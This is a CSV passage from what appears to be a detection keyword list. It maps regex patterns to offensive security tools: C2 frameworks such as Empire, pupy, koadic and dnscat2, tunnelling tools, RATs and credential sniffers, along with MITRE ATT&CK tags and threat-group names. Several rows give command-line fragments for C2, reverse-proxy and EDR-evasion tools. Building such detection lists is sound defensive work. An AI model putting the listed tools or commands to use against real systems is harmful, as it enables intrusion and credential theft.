Evasion","https://github.com/sensepost/kwetza","1","0","N/A","N/A","7","623","240","2023-07-21T16:30:40Z","2016-09-22T14:39:10Z" "*sensepost/rattler*",".{0,1000}sensepost\/rattler.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","1","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*sensepost/reGeorg*",".{0,1000}sensepost\/reGeorg.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2936","814","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" "*sensepost/ruler*",".{0,1000}sensepost\/ruler.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*sensepost/wiresocks*",".{0,1000}sensepost\/wiresocks.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","9","3","264","28","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z" "*sensitive_files_win.txt*",".{0,1000}sensitive_files_win\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Sensitivelocalfiles.txt*",".{0,1000}Sensitivelocalfiles\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*senzee1984/InflativeLoading*",".{0,1000}senzee1984\/InflativeLoading.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*senzee1984/micr0_shell*",".{0,1000}senzee1984\/micr0_shell.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","2","126","18","2024-02-19T02:15:36Z","2023-08-13T02:46:51Z" "*senzee1984/MutationGate*",".{0,1000}senzee1984\/MutationGate.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","1","N/A","8","2","195","29","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z" "*seriously_nothing_shady_here*",".{0,1000}seriously_nothing_shady_here.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Serve Pyramid files over HTTP/S and provide basic authentication.*",".{0,1000}Serve\sPyramid\sfiles\sover\sHTTP\/S\sand\sprovide\sbasic\sauthentication\..{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*serve_ps1_payload*",".{0,1000}serve_ps1_payload.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Server enforces NLA; switching to 'fake server' mode*",".{0,1000}Server\senforces\sNLA\;\sswitching\sto\s\'fake\sserver\'\smode.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1364","326","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" "*server.py generate --address * --port * --output * --source*",".{0,1000}server\.py\sgenerate\s\-\-address\s.{0,1000}\s\-\-port\s.{0,1000}\s\-\-output\s.{0,1000}\s\-\-source.{0,1000}","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","0","N/A","N/A","7","670","152","2023-12-09T00:42:07Z","2020-05-10T17:37:37Z" "*server/modules/csharp/*",".{0,1000}server\/modules\/csharp\/.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*server/ToRat_server*",".{0,1000}server\/ToRat_server.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*server@egress-asses.com*",".{0,1000}server\@egress\-asses\.com.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*server=*port=53531*",".{0,1000}server\=.{0,1000}port\=53531.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","0","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*-server=http://127.0.0.1:4002*",".{0,1000}\-server\=http\:\/\/127\.0\.0\.1\:4002.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*server-7566091c4e4a2a24.js*",".{0,1000}server\-7566091c4e4a2a24\.js.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*server-console.exe +*",".{0,1000}server\-console\.exe\s\+.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","10","10","344","37","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" "*server-console.py --mifi-ip *",".{0,1000}server\-console\.py\s\-\-mifi\-ip\s.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","10","10","344","37","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" "*ServerlessRedirector-main*",".{0,1000}ServerlessRedirector\-main.{0,1000}","offensive_tool_keyword","ServerlessRedirector","Serverless Redirector in various cloud vendor for red team","T1090.003 - T1095 - T1001.003","TA0010 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/KINGSABRI/ServerlessRedirector","1","1","N/A","10","1","69","10","2022-12-08T08:56:02Z","2022-12-08T07:52:49Z" "*--server-port * --server-ip * --proxy-ip * --proxy-port *",".{0,1000}\-\-server\-port\s.{0,1000}\s\-\-server\-ip\s.{0,1000}\s\-\-proxy\-ip\s.{0,1000}\s\-\-proxy\-port\s.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","533","123","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "*serverscan.linux.elf*",".{0,1000}serverscan\.linux\.elf.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*serverscan.linux.so*",".{0,1000}serverscan\.linux\.so.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*serverScan.win.cna*",".{0,1000}serverScan\.win\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*serverscan_386.exe*",".{0,1000}serverscan_386\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*ServerScan_Air_*.exe*",".{0,1000}ServerScan_Air_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*ServerScan_Air_*_amd64*",".{0,1000}ServerScan_Air_.{0,1000}_amd64.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*ServerScan_Air_*_i386*",".{0,1000}ServerScan_Air_.{0,1000}_i386.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*serverscan_air-probes.exe*",".{0,1000}serverscan_air\-probes\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*serverscan_amd64.exe*",".{0,1000}serverscan_amd64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*ServerScan_Pro_*.exe*",".{0,1000}ServerScan_Pro_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*ServerScan_Pro_*_amd64*",".{0,1000}ServerScan_Pro_.{0,1000}_amd64.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*ServerScan_Pro_*_i386*",".{0,1000}ServerScan_Pro_.{0,1000}_i386.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 